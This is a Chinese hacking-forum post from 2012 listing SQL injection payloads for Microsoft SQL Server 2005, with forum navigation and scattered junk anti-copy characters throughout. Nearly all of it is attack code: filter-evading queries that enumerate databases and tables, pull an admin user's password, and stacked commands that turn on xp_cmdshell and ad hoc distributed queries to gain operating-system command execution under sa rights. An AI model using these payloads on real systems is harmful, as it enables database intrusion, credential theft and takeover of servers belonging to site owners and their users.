找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2767|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" q) U( [8 z2 x* `1 p1 E9 Q9 Y6 ?1 Y; o! y
5 \  E1 C* u! |  q- I
[Copy to clipboard]CODE:' C5 t( z, D4 {; a9 Y) r  a5 z/ d
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--- M( T) @5 R  E) P
7 ]% O( b( @, X! Y- Y
爆表语句,somedb部份是所要列的数据库,红色数字1累加  B# Z0 E6 O) @0 V9 B
& V4 x6 {; v4 y7 g0 t7 l7 o

$ W3 m; F! g: a% _7 w: h; e[Copy to clipboard]CODE:
; s% e0 |1 N- @" m: Q& r6 I0 z/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
: R: e. J  A& o, V7 M9 h# m7 ~: x6 K  S
- |& k$ |! K* x! z! L爆字段语句,爆表admin里user='icerover'的密码段$ C9 P: L5 [0 \1 Q& Z$ o  H

7 b  G) ~# d5 m, c5 o7 p& i+ T7 {6 U1 @7 u, p. ?
[Copy to clipboard]CODE:, e) A3 s7 f* X+ Q4 R
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
  U/ f# N- a5 W! Q6 ]6 m% u
2 [' ^! O' E# F: {1 B: Omssql2005默认没有开xp_cmdshell的,openrowset也不能用
) x( l" Y& f& g如果是sa权限,可以这样来开启# O4 M7 y& @$ y) W. F
开启openrowset4 r7 T) S: |9 ~: r/ I; J
5 O- E4 w$ I& V0 R3 L- Z
/ H( G! v) q0 Q' f
[Copy to clipboard]CODE:  b, P) C7 [* Q! V" R1 w
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
6 P3 c7 y/ a* M/ }9 S/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--0 S/ `8 p! O! r, g' H

3 }8 H2 _5 p# ?0 a# D0 D5 p2 j开启xp_cmdshell5 m4 |. I/ S; R5 g7 F4 B
$ `! W. _7 s% Y* S5 n' ^
6 t8 U7 O! g( _8 m+ t/ }
[Copy to clipboard]CODE:1 l5 v  s1 u. d" ^
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--8 n: C7 v7 b1 ~: e! g
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--( b. i$ k1 A$ ?4 [
6 x& |4 k1 \- ~/ T3 l
ok,over~~晚安% v  c% \$ p& j. V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表